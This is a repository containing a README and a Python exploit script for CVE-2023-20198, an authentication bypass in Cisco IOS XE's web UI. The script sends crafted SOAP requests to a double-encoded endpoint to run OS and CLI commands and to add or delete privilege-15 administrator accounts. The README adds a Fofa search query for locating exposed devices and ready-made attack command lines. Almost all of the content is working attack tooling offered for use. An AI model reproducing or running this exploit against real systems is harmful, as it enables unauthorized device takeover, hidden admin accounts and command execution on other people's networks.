├── README.md
└── CVE-2023-20198-RCE.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Fofa
 2 | 
 3 | ```
 4 | body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>" && is_honeypot=false && is_fraud=false
 5 | ```
 6 | 
 7 | # Usage
 8 | 
 9 | ```
10 | usage: CVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]
11 |                              [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]
12 | 
13 | CVE-2023-20198-RCE
14 | 
15 | options:
16 |   -h, --help            show this help message and exit
17 |   -u URL, --url URL     target url to check, eg: http://example.com
18 |   -p PROXY, --proxy PROXY
19 |                         proxy url, eg: http://127.0.0.1:8083
20 |   -au ADD_USER, --add-user ADD_USER
21 |                         username to add.If left blank, an 8-digit mixed case English string will be randomly
22 |                         generated.
23 |   -ap ADD_PASS, --add-pass ADD_PASS
24 |                         password to add.If left blank, an 8-digit mixed case English string will be randomly
25 |                         generated.
26 |   -du DEL_USER, --del-user DEL_USER
27 |                         username to delete
28 |   -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE
29 |                         user/privileged
30 |   -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE
31 |                         user/cmd
32 |   -oc OS_CMD, --os-cmd OS_CMD
33 |                         exec os command
34 |   -cc CLI_CMD, --cli-cmd CLI_CMD
35 |                         exec cli command
36 | ```
37 | 
38 | For example:
39 | 
40 | ```powershell
41 | python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -pm privileged -cc "show version" 
42 | 
43 | python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -oc "uname -a" 
44 | 
45 | python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au -ap
46 | 
47 | python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au hahahahha -ap hahahahha
48 | 
49 | python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -du aaaaaa
50 | 
51 | ```
52 | 
53 | ![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240425153133359.png)
54 | 


--------------------------------------------------------------------------------
/CVE-2023-20198-RCE.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | import random
  3 | import string
  4 | import sys
  5 | 
  6 | import requests
  7 | import argparse
  8 | import xml.etree.ElementTree as ET
  9 | 
 10 | def GenerateRandTextAlpha(length):
 11 |     letters = string.ascii_letters
 12 |     return "".join(random.choice(letters) for _ in range(length))
 13 | 
 14 | def GetOutputResult(resp_text, cisco_method, exploit_mode):
 15 |     if exploit_mode == "user":
 16 |         return resp_text
 17 |     if cisco_method == "urn:cisco:wsma-exec":
 18 |         root = ET.fromstring(resp_text)
 19 |         namespaces = {
 20 |             "SOAP": "http://schemas.xmlsoap.org/soap/envelope/",
 21 |             "cisco": cisco_method
 22 |         }
 23 |         text_content = root.find('.//cisco:text', namespaces=namespaces)
 24 |         return text_content.text.strip()
 25 |     elif cisco_method == "urn:cisco:wsma-config":
 26 |         root = ET.fromstring(resp_text)
 27 |         namespaces = {
 28 |             "SOAP": "http://schemas.xmlsoap.org/soap/envelope/",
 29 |             "cisco": cisco_method
 30 |         }
 31 |         text_content = root.find('.//cisco:text', namespaces=namespaces)
 32 |         result = ""
 33 |         pattern = r"\*\*CLI Line # 2: (.*)"
 34 |         matches = re.findall(pattern, text_content.text.strip())
 35 |         for match in matches:
 36 |             result += match + "\n"
 37 |         return result
 38 | 
 39 | def RunCliCommand(url, command, proxy, exploit_mode):
 40 |     if url.startswith("https://"):
 41 |         uri = "/%2577ebui_wsma_https"
 42 |     elif url.startswith("http://"):
 43 |         uri = "/%2577ebui_wsma_Http"
 44 |     else:
 45 |         print("[x] Invalid URL. Example: http://example.com")
 46 |         return None
 47 |     target_url = url + uri
 48 |     exp_xml = f"""<?xml version="1.0"?>
 49 | 	<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 50 | 	<SOAP:Header>
 51 | 	  <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
 52 | 		<wsse:UsernameToken SOAP:mustUnderstand="false">
 53 | 		  <wsse:Username>{GenerateRandTextAlpha(4)}</wsse:Username>
 54 | 		  <wsse:Password>*****</wsse:Password>
 55 | 		</wsse:UsernameToken>
 56 | 	  </wsse:Security>
 57 | 	</SOAP:Header>
 58 | 	<SOAP:Body>
 59 | 	  <request correlator="{GenerateRandTextAlpha(8)}" xmlns="urn:cisco:wsma-config">
 60 | 		<configApply details="all" action-on-fail="continue">
 61 | 		  <config-data>
 62 | 		   <cli-config-data-block>{command}</cli-config-data-block>
 63 | 		  </config-data>
 64 | 		</configApply>
 65 | 	  </request>
 66 | 	</SOAP:Body>
 67 | </SOAP:Envelope>"""
 68 |     headers = {
 69 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
 70 |     }
 71 |     try:
 72 |         response = requests.post(url=target_url, headers=headers, data=exp_xml, verify=False, allow_redirects=False,
 73 |                                  proxies=proxy, timeout=20)
 74 |         if response.status_code == 200:
 75 |             result = GetOutputResult(response.text, "urn:cisco:wsma-config", exploit_mode=exploit_mode)
 76 |             return result
 77 |     except:
 78 |         return None
 79 | 
 80 | def RunOSCommand(url, command, proxy):
 81 |     if url.startswith("https://"):
 82 |         uri = "/%2577ebui_wsma_https"
 83 |     elif url.startswith("http://"):
 84 |         uri = "/%2577ebui_wsma_Http"
 85 |     else:
 86 |         print("[x] Invalid URL. Example: http://example.com")
 87 |         return None
 88 |     target_url = url + uri
 89 |     exp_xml = f"""<?xml version="1.0"?> <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/"
 90 | xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 91 | xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
 92 | xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <SOAP:Header> <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext"> <wsse:UsernameToken SOAP:mustUnderstand="false"> <wsse:Username>admin</wsse:Username>
 93 | <wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator="{GenerateRandTextAlpha(8)}" xmlns="urn:cisco:wsma-exec"> <execCLI xsd="false"><cmd>{command}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>"""
 94 |     headers = {
 95 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
 96 |     }
 97 |     try:
 98 |         response = requests.post(url=target_url, headers=headers, data=exp_xml, verify=False, allow_redirects=False,
 99 |                                  proxies=proxy, timeout=20)
100 |         if response.status_code == 200:
101 |             result = GetOutputResult(response.text, "urn:cisco:wsma-exec", exploit_mode="cmd")
102 |             return result
103 |     except:
104 |         return None
105 | 
106 | def AddUser(url, proxy, username, password):
107 |     res = RunCliCommand(url=url, command=f"username {username} privilege 15 secret {password}", proxy=proxy, exploit_mode="user")
108 |     if "<success" in res:
109 |         print(f"[+] Add username: {username}, password: {password}")
110 |     else:
111 |         print(f"[-] failed to add user.")
112 | 
113 | def DeleteUser(url, proxy, username):
114 |     res = RunCliCommand(url=url, command=f"no username {username} privilege 15", proxy=proxy, exploit_mode="user")
115 |     if "<success" in res:
116 |         print(f"[+] Delete username: {username}")
117 |     else:
118 |         print(f"[-] failed to add user.")
119 | 
120 | def ParseArgs():
121 |     parser = argparse.ArgumentParser(description="CVE-2023-20198-RCE")
122 |     parser.add_argument("-u", "--url", type=str, help="target url to check, eg: http://example.com", required=True)
123 |     parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False)
124 |     parser.add_argument("-au", "--add-user", nargs="?", const="", default="", help="username to add.If left blank, an 8-digit mixed case English string will be randomly generated.", required=False)
125 |     parser.add_argument("-ap", "--add-pass", nargs="?", const="", help="password to add.If left blank, an 8-digit mixed case English string will be randomly generated.", required=False)
126 |     parser.add_argument("-du", "--del-user", type=str, help="username to delete", required=False)
127 |     parser.add_argument("-pm", "--privilege-mode", type=str, help="user/privileged", required=False)
128 |     parser.add_argument("-em", "--exploit-mode", type=str, help="user/cmd", required=False)
129 |     parser.add_argument("-oc", "--os-cmd", type=str, help="exec os command", required=False)
130 |     parser.add_argument("-cc", "--cli-cmd", type=str, help="exec cli command", required=False)
131 |     return parser.parse_args()
132 | 
133 | def banner():
134 |     banner = r"""
135 |   ______     _______     ____   ___ ____  _____      ____   ___  _  ___   ___  
136 |  / ___\ \   / / ____|   |___ \ / _ \___ \|___ /     |___ \ / _ \/ |/ _ \ ( _ ) 
137 | | |    \ \ / /|  _| _____ __) | | | |__) | |_ \ _____ __) | | | | | (_) |/ _ \ 
138 | | |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____/ __/| |_| | |\__, | (_) |
139 |  \____|  \_/  |_____|   |_____|\___/_____|____/     |_____|\___/|_|  /_/ \___/ 
140 |                                                             Author : W01fh4cker
141 |                                                             Twitter : @W01fh4cker
142 |                                                             Github : https://github.com/W01fh4cker
143 |     """
144 |     print(banner)
145 | 
146 | if __name__ == "__main__":
147 |     banner()
148 |     args = ParseArgs()
149 |     if not args.proxy:
150 |         proxy = {}
151 |     else:
152 |         proxy = {
153 |             "http": args.proxy,
154 |             "https": args.proxy
155 |         }
156 |     if args.exploit_mode == "user":
157 |         if args.os_cmd or args.cli_cmd:
158 |             print("[x] You specified the wrong module, it should be: -em cmd")
159 |             sys.exit(0)
160 |         if args.del_user:
161 |             DeleteUser(args.url, proxy, args.del_user)
162 |         else:
163 |             if args.add_user and args.add_pass:
164 |                 AddUser(args.url, proxy, args.add_user, args.add_pass)
165 |             elif args.add_user and not args.add_pass:
166 |                 AddUser(args.url, proxy, args.add_user, GenerateRandTextAlpha(8))
167 |             elif not args.add_user and args.add_pass:
168 |                 AddUser(args.url, proxy, GenerateRandTextAlpha(8), args.add_pass)
169 |             else:
170 |                 AddUser(args.url, proxy, GenerateRandTextAlpha(8), GenerateRandTextAlpha(8))
171 | 
172 |     elif args.exploit_mode is None:
173 |         print("[*] Please specify the usage module (user/cmd). eg: -em user")
174 |     else:
175 |         if args.os_cmd:
176 |             result = RunOSCommand(url=args.url, command=args.os_cmd, proxy=proxy)
177 |             if result is None:
178 |                 print("[-] Failed to execute os command.")
179 |             elif result == "":
180 |                 print("[*] The target environment is special and this command does not exist. You can try executing the \"uname -a\" command to check.")
181 |             else:
182 |                 print(result)
183 |         if args.cli_cmd:
184 |             if args.privilege_mode is None:
185 |                 print("[*] Please specify the usage module (user/privileged). eg: -pm privileged")
186 |                 sys.exit(0)
187 |             if args.privilege_mode == "user":
188 |                 command = f"<![CDATA[exit\nexit\n{args.cli_cmd}]]>"
189 |             else:
190 |                 command = f"<![CDATA[exit\n{args.cli_cmd}]]>"
191 |             result = RunCliCommand(url=args.url, command=command, proxy=proxy, exploit_mode="cmd")
192 |             if result is None:
193 |                 print("[-] Failed to execute cli command.")
194 |             elif result == "":
195 |                 print("[*] The target environment is special and this command does not exist. You can try executing the \"show version\" command to check.")
196 |             else:
197 |                 print(result)
198 | 


--------------------------------------------------------------------------------